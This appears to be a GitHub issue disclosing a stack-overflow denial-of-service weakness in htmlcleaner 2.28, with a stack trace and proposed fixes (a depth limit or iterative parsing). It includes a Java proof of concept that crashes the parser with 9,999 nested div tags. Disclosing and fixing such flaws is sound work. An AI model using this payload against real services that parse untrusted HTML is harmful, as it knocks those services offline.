Open
Description
Stack overflow error caused by htmlcleaner parsing of untrusted HTML String
Description
Using htmlcleaner to parse untrusted HTML String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at java.base/java.util.HashMap$KeyIterator.<init>(HashMap.java:1531)
at java.base/java.util.HashMap$KeySet.iterator(HashMap.java:913)
at java.base/java.util.HashSet.iterator(HashSet.java:173)
at org.htmlcleaner.HtmlCleaner.addIfNeededToPruneSet(HtmlCleaner.java:1339)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:332)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
PoC
<dependency>
<groupId>net.sourceforge.htmlcleaner</groupId>
<artifactId>htmlcleaner</artifactId>
<version>2.28</version>
</dependency>import org.htmlcleaner.HtmlCleaner;
import org.htmlcleaner.TagNode;
public class PoC {
public final static int TOO_DEEP_NESTING = 9999;
public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "<div>", "</div>", "");
public static String _nestedDoc(int nesting, String open, String close, String content) {
StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
for (int i = 0; i < nesting; ++i) {
sb.append(open);
if ((i & 31) == 0) {
sb.append("\n");
}
}
sb.append("\n").append(content).append("\n");
for (int i = 0; i < nesting; ++i) {
sb.append(close);
if ((i & 31) == 0) {
sb.append("\n");
}
}
return sb.toString();
}
public static void main(String[] args) {
String htmlData = TOO_DEEP_DOC;
try {
// 模糊测试组件的风险接口
HtmlCleaner cleaner = new HtmlCleaner();
TagNode root = cleaner.clean(htmlData);
// 对解析结果进行进一步操作
// ...
} catch (Exception e) {
// 处理异常
}
}
}Rectification Solution
-
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
-
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
Metadata
Metadata
Assignees
Labels
No labels